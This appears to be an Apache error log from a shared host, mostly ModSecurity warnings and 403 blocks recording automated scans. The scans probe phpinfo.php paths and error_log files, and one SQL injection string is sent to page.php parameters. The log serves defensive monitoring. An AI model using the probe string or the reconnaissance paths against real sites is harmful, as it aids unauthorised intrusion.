[Mon May 11 16:34:03.939977 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vQAAAIg"]
[Mon May 11 16:34:03.940259 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vQAAAIg"]
[Mon May 11 16:34:04.101588 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vgAAAIg"]
[Mon May 11 16:34:04.101790 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vgAAAIg"]
[Mon May 11 16:34:04.102054 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/site/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vgAAAIg"]
[Mon May 11 16:34:04.260455 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vwAAAIg"]
[Mon May 11 16:34:04.260706 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vwAAAIg"]
[Mon May 11 16:34:04.260958 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/docs/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1vwAAAIg"]
[Mon May 11 16:34:04.420940 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wAAAAIg"]
[Mon May 11 16:34:04.421144 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wAAAAIg"]
[Mon May 11 16:34:04.421421 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-admin/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wAAAAIg"]
[Mon May 11 16:34:04.580205 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wgAAAIg"]
[Mon May 11 16:34:04.580413 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wgAAAIg"]
[Mon May 11 16:34:04.580690 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/administrator/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wgAAAIg"]
[Mon May 11 16:34:04.738610 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wwAAAIg"]
[Mon May 11 16:34:04.738816 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wwAAAIg"]
[Mon May 11 16:34:04.739106 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/core/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1wwAAAIg"]
[Mon May 11 16:34:04.905560 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1xAAAAIg"]
[Mon May 11 16:34:04.905759 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1xAAAAIg"]
[Mon May 11 16:34:04.906000 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/includes/phpinfo.php"] [unique_id "agHo3Py_GXSWIKeli0v1xAAAAIg"]
[Mon May 11 16:35:25.753291 2026] [security2:error] [pid 1412074:tid 1412094] [client 102.165.1.241:54823] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHpLTJnyuKVXoStDha4xQAAAFI"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:35:44.319019 2026] [:error] [pid 1412074:tid 1412091] [client 154.83.211.58:62599] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 16:36:04.787178 2026] [security2:error] [pid 1424905:tid 1424916] [client 43.163.4.179:35230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/"] [unique_id "agHpVIW8yzYoWG_eyCWcEgAAAUg"]
[Mon May 11 16:36:08.727554 2026] [security2:error] [pid 1411099:tid 1411119] [client 43.163.4.179:39750] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agHpWA-Qm4vhlWBPlMi-HgAAABM"], referer: http://www.habilis.space
[Mon May 11 16:37:14.343698 2026] [security2:error] [pid 1411099:tid 1411101] [client 5.36.156.246:55100] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'son),' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: son), found within ARGS:idpage: 'nvOpzp; AND 1=1 OR (<'\\x22>iKO)),"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agHpmg-Qm4vhlWBPlMi-aAAAAAA"]
[Mon May 11 16:37:14.344398 2026] [security2:error] [pid 1411099:tid 1411101] [client 5.36.156.246:55100] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'son),' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: son), found within ARGS:L: 'nvOpzp; AND 1=1 OR (<'\\x22>iKO)),"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agHpmg-Qm4vhlWBPlMi-aAAAAAA"]
[Mon May 11 16:37:14.344614 2026] [security2:error] [pid 1411099:tid 1411101] [client 5.36.156.246:55100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agHpmg-Qm4vhlWBPlMi-aAAAAAA"]
[Mon May 11 16:37:14.345112 2026] [security2:error] [pid 1411099:tid 1411101] [client 5.36.156.246:55100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agHpmg-Qm4vhlWBPlMi-aAAAAAA"]
[Mon May 11 16:38:39.547029 2026] [authz_core:error] [pid 1424905:tid 1424932] [client 194.163.167.152:64306] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 16:38:45.317571 2026] [authz_core:error] [pid 1424905:tid 1424917] [client 194.163.167.152:59048] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 16:38:53.373931 2026] [authz_core:error] [pid 1411099:tid 1411119] [client 194.163.167.152:52256] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Mon May 11 16:39:01.225620 2026] [authz_core:error] [pid 1411201:tid 1411266] [client 194.163.167.152:50385] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Mon May 11 16:39:59.163238 2026] [autoindex:error] [pid 1416109:tid 1416141] [client 108.130.92.59:40142] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 16:40:14.921606 2026] [core:error] [pid 1412074:tid 1412087] [client 4.193.137.131:11318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:14.921739 2026] [core:error] [pid 1412074:tid 1412087] [client 4.193.137.131:11318] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:15.431503 2026] [core:error] [pid 1411201:tid 1411256] [client 4.193.137.131:11271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:15.431550 2026] [core:error] [pid 1411201:tid 1411256] [client 4.193.137.131:11271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:15.947757 2026] [core:error] [pid 1416109:tid 1416143] [client 4.193.137.131:11663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:15.947800 2026] [core:error] [pid 1416109:tid 1416143] [client 4.193.137.131:11663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:16.438290 2026] [core:error] [pid 1412074:tid 1412081] [client 4.193.137.131:11273] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:16.438327 2026] [core:error] [pid 1412074:tid 1412081] [client 4.193.137.131:11273] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:16.916673 2026] [core:error] [pid 1416109:tid 1416134] [client 4.193.137.131:11290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:16.916731 2026] [core:error] [pid 1416109:tid 1416134] [client 4.193.137.131:11290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:17.402066 2026] [core:error] [pid 1424905:tid 1424916] [client 4.193.137.131:11278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:17.402100 2026] [core:error] [pid 1424905:tid 1424916] [client 4.193.137.131:11278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:17.437913 2026] [security2:error] [pid 1411201:tid 1411266] [client 43.166.255.102:50996] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHqUfy_GXSWIKeli0v3jQAAAJU"]
[Mon May 11 16:40:17.916010 2026] [core:error] [pid 1411055:tid 1411075] [client 4.193.137.131:11315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:17.916053 2026] [core:error] [pid 1411055:tid 1411075] [client 4.193.137.131:11315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:18.393265 2026] [core:error] [pid 1411201:tid 1411263] [client 4.193.137.131:11265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:18.393301 2026] [core:error] [pid 1411201:tid 1411263] [client 4.193.137.131:11265] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:18.893818 2026] [core:error] [pid 1412074:tid 1412096] [client 4.193.137.131:11283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:18.893845 2026] [core:error] [pid 1412074:tid 1412096] [client 4.193.137.131:11283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:19.370980 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11294] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:19.371024 2026] [core:error] [pid 1411099:tid 1411108] [client 4.193.137.131:11294] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:40:19.888211 2026] [core:error] [pid 1412074:tid 1412076] [client 4.193.137.131:11324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
